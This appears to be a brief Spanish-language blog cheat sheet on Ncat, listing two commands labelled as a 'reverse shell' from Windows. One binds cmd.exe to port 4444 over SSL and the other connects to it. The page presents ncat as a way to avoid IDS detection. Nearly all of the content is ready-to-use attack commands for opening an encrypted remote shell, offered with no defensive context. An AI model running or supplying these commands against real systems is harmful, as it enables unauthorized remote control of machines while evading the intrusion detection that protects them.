← Blog

Ncat - Shells Seguras

Apuntes y comandos de Ncat - Shells Seguras para Linux.

Ncat - Netcat for Nmap project which provides more security avoid IDS

  • Reverse shell from windows using cmd.exe using ssl
ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
  • Listen on port 4444 using ssl
ncat -v $ip 4444 --ssl